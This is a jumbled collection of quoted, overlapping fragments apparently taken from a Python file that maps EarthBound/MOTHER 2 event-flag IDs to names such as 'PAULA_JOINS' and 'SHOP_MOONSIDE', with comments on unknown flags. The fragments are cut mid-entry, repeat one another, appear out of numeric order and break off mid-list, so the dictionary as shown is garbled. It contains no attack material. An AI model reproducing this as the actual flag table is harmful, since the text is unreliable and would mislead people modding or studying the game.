'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE',", "'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND',", "389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag", "292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel", "353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359:", "'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER',", "'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???)", "'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN',", "Tess. This is only set if you're near (0x02A0, 0x0D70) in a radius", "'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. 
Set when you receive the", "'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for", "'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP',", "'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD',", "325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331:", "437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443:", "450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456:", "# Flag names for MOTHER2/Earthbound # Luckily, every version uses the same flag", "208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214:", "'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate", "'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula", "(Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus", "'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE',", "386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for this", "575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581:", "'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED',", "533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???)", "733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739:", "(???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED',", "106 (???) 
107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL',", "'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2',", "about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED',", "357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363:", "772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774:", "214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220:", "'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK',", "'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED',", "383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC", "'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK',", "'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465", "Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE',", "31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37:", "519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524:", "# 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something", "show about to start?) # 680 (Something about Venus show about to start?)", "302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4',", "'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP',", "the Gourmet Yogurt Machine) # 377 (???) # 378 (???) 
379: 'ANDONUTS_AT_LAB_ABSENT', #", "260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266:", "hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301:", "10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16:", "'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED',", "'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM',", "336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER',", "'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH',", "# 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345", "'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT',", "'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS',", "45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51:", "to Lake Tess. This is only set if you're near (0x02A0, 0x0D70) in", "'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES',", "(???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) #", "'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED',", "'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 
449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE',", "307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', #", "46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52:", "'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK',", "251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257:", "the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3',", "(Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155:", "'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433:", "uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3:", "117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123:", "261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267:", "285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess color palette)", "# Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't", "600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606:", "# Luckily, every version uses the same flag IDs FLAG_NAMES = { 1:", "'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE',", "is set even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128:", "15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21:", "(???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED',", "380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS',", "# 607 (Unknown. Related to desert mine?) 
608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED',", "829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6', 835:", "90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96:", "'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL',", "203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209:", "663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669:", "'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES',", "263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269:", "(???) # 162 (???) # 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166:", "Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING',", "753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759:", "'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3',", "159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162 (???) # 163", "'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY',", "'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags)", "'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for", "187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193:", "'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy", "146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 
148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150", "238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244:", "'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME',", "'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851", "start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP',", "365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown.", "'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE',", "'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE',", "459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', #", "arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT',", "642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 